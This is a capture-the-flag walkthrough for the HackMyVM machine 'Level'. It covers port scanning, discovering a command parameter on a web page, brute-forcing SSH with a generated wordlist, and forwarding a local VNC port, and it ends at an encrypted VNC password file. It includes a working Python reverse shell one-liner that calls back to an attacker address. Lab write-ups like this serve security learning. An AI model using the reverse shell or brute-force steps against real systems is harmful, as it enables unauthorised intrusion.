HackMyVM-Level

ARZ101
6 min read · Jan 10, 2021

This is a medium-level box I found on this platform, and it's a great box that teaches you about the VNC protocol.

NMAP

Nmap scan report for 192.168.1.106
Host is up (0.00037s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.8
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
65000/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 e0:e7:a1:e4:f8:6f:ce:9f:e5:b8:61:a0:83:e8:e4:77 (RSA)
| 256 69:6a:91:6b:bb:bf:60:55:dc:a3:0b:8f:53:b7:83:7b (ECDSA)
|_ 256 8e:92:3d:35:d2:25:4e:e2:f4:1e:21:70:56:56:94:e4 (ED25519)
MAC Address: 08:00:27:8C:C8:F1 (Oracle VirtualBox virtual NIC)
Service Info: Host: LEVEL; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -20m00s, deviation: 34m38s, median: 0s
|_nbstat: NetBIOS name: LEVEL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: level
| NetBIOS computer name: LEVEL\x00
| Domain name: \x00
| FQDN: level
|_ System time: 2021-01-09T18:41:01+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-01-09T17:41:01
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.47 seconds

PORT 21 (FTP)

There wasn’t anything on ftp server.

PORT 139/445 (SMB)

There weren't any shares that we could access anonymously.

Running enum4linux-ng, I found a single user, named one.

PORT 80

Looking at robots.txt

We saw these directories, but they were not on the box. Scrolling down a bit, we find some text written in Brainfuck.

Visiting this directory gives us a sort of wordlist.

Using this wordlist we found a directory.

But we still need to enumerate more.

I ran the wordlist against the Level2021 directory,

but only found a static message. I guessed that the page might take a cmd parameter, and I was right.

To get a reverse shell I used the Python reverse shell payload:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.8",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Then I found a hint in the /home directory:

################################################
#                                              #
# changing "x" to "number" can be a great idea #
#                                              #
# one:0n30n3xxx                                #
#                                              #
################################################

I tried guessing the password with 0n30n3111 and 0n30n30n3 but failed.

I ran linpeas, and the only thing I could dig out was an open port (5901) that was listening only on localhost.

So we can do SSH port forwarding, but for that we need a valid password for the user one. Going back to .one_secret.txt, we may need to craft a wordlist of passwords of the form 0n30n3xxx, where xxx are three random digits.

I used crunch to make a wordlist of that pattern, knowing that the length of the password is 9.

Then I used this wordlist to brute-force SSH with the username one.

Let's connect to port 5901 with netcat.

Searching this on Google shows it has something to do with VNC (Virtual Network Computing), which is used for remote access to a computer, similar to Windows RDP.

Here RFB 003.008 means the remote port is a VNC server and it is up. Now, in order to access this port, we need to do SSH port forwarding.
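The banner netcat printed is the RFB ProtocolVersion message the server sends first. As an added example (not code from the original post), here is a small Python parser that recognises that 12-byte greeting and tells a localhost-only listener like this one apart from other services; the sample banners are constructed, not captured from the box.

```python
import re
import socket
from typing import Optional, Tuple

# RFB ProtocolVersion message (RFC 6143, section 7.1.1): exactly 12 bytes,
# "RFB " + 3-digit major + "." + 3-digit minor + "\n". The server sends it
# first, which is why a bare netcat connection already shows "RFB 003.008".
RFB_VERSION_RE = re.compile(rb"^RFB (\d{3})\.(\d{3})\n$")


def parse_rfb_version(banner: bytes) -> Optional[Tuple[int, int]]:
    """Return (major, minor) if banner starts with a well-formed RFB
    ProtocolVersion message, else None. Data after byte 12 is ignored."""
    m = RFB_VERSION_RE.match(banner[:12])
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def describe_rfb(banner: bytes) -> str:
    """One-line summary, e.g. for an inventory of what is listening locally."""
    ver = parse_rfb_version(banner)
    if ver is None:
        return "not a VNC/RFB server"
    major, minor = ver
    known = {(3, 3), (3, 7), (3, 8)}          # versions defined by RFC 6143
    note = "" if ver in known else " (non-standard version string)"
    return f"VNC server speaking RFB {major}.{minor}{note}"


def probe_rfb(host: str, port: int, timeout: float = 3.0) -> Optional[Tuple[int, int]]:
    """Connect, read the server's 12-byte greeting and parse it. Run from the
    box itself (e.g. probe_rfb("127.0.0.1", 5901)) to confirm what a
    localhost-only listener is before setting up any forwarding."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        data = b""
        while len(data) < 12:
            chunk = s.recv(12 - len(data))
            if not chunk:
                break
            data += chunk
    return parse_rfb_version(data)


# Constructed sample banners (not captured from the target).
SAMPLE_VNC_BANNER = b"RFB 003.008\n"
SAMPLE_SSH_BANNER = b"SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2\r\n"
```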

Now, if we go to our browser using localhost:5901, we will get this result.

In order to connect to VNC we need a password. By default it is saved in $HOME/.vnc/passwd, but in this case it isn't configured to be saved there, so we need to find the password file on the target machine.

In one's directory we can see ... which is a folder

Here remote_level is the encrypted password file for connecting to VNC.
